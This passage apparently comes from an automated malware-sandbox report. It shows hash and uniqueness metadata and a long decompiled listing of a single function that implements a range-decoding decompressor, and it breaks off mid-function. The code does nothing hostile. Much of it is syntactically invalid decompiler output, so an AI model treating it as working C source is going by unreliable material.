                                                          • Instruction Fuzzy Hash: 6BD0C911656D3072C9523B2A3D0AFCF150C8F5631AF5180BBF908B90C64B6C6A8319EF
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004064B8 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 99%
                                                          			E004064B8() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406926))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
